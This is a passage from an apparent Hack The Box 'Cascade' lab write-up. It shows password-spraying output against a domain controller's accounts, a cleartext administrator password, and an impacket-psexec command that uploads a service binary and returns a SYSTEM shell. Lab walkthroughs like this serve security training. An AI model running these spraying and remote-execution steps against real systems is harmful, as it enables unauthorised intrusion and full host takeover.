SMB 10.129.41.255 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.129.41.255 445 CASC-DC1 [-] cascade.local\CascGuest:baCT3r1aN00dles STATUS_LOGON_FAILURE
SMB 10.129.41.255 445 CASC-DC1 [-] cascade.local\arksvc:baCT3r1aN00dles STATUS_LOGON_FAILURE
SMB 10.129.41.255 445 CASC-DC1 [-] cascade.local\s.smith:baCT3r1aN00dles STATUS_LOGON_FAILURE
SMB 10.129.41.255 445 CASC-DC1 [-] cascade.local\r.thompson:baCT3r1aN00dles STATUS_LOGON_FAILURE
SMB 10.129.41.255 445 CASC-DC1 [-] cascade.local\util:baCT3r1aN00dles STATUS_LOGON_FAILURE
SMB 10.129.41.255 445 CASC-DC1 [-] cascade.local\j.wakefield:baCT3r1aN00dles STATUS_LOGON_FAILURE
SMB 10.129.41.255 445 CASC-DC1 [-] cascade.local\s.hickson:baCT3r1aN00dles STATUS_LOGON_FAILURE
SMB 10.129.41.255 445 CASC-DC1 [-] cascade.local\j.goodhand:baCT3r1aN00dles STATUS_LOGON_FAILURE
SMB 10.129.41.255 445 CASC-DC1 [-] cascade.local\a.turnbull:baCT3r1aN00dles STATUS_LOGON_FAILURE
SMB 10.129.41.255 445 CASC-DC1 [-] cascade.local\e.crowe:baCT3r1aN00dles STATUS_LOGON_FAILURE
SMB 10.129.41.255 445 CASC-DC1 [-] cascade.local\b.hanson:baCT3r1aN00dles STATUS_LOGON_FAILURE
SMB 10.129.41.255 445 CASC-DC1 [-] cascade.local\d.burman:baCT3r1aN00dles STATUS_LOGON_FAILURE
SMB 10.129.41.255 445 CASC-DC1 [-] cascade.local\BackupSvc:baCT3r1aN00dles STATUS_LOGON_FAILURE
SMB 10.129.41.255 445 CASC-DC1 [-] cascade.local\j.allen:baCT3r1aN00dles STATUS_LOGON_FAILURE
SMB 10.129.41.255 445 CASC-DC1 [-] cascade.local\i.croft:baCT3r1aN00dles STATUS_LOGON_FAILURE
SMB 10.129.41.255 445 CASC-DC1 [-] cascade.local\TedAdmin:baCT3r1aN00dles STATUS_LOGON_FAILURE
SMB 10.129.41.255 445 CASC-DC1 [+] cascade.local\administrator:baCT3r1aN00dles (Pwn3d!)
Logging in with this password gives SYSTEM.
┌──(kali㉿kali)-[~/htb/cascade]
└─$ impacket-psexec cascade.local/administrator:'baCT3r1aN00dles'@10.129.41.255
Impacket v0.14.0.dev0+20260109.161801.028f0724 - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on 10.129.41.255.....
[*] Found writable share ADMIN$
[*] Uploading file wftdhUmI.exe
[*] Opening SVCManager on 10.129.41.255.....
[*] Creating service AkJx on 10.129.41.255.....
[*] Starting service AkJx.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32>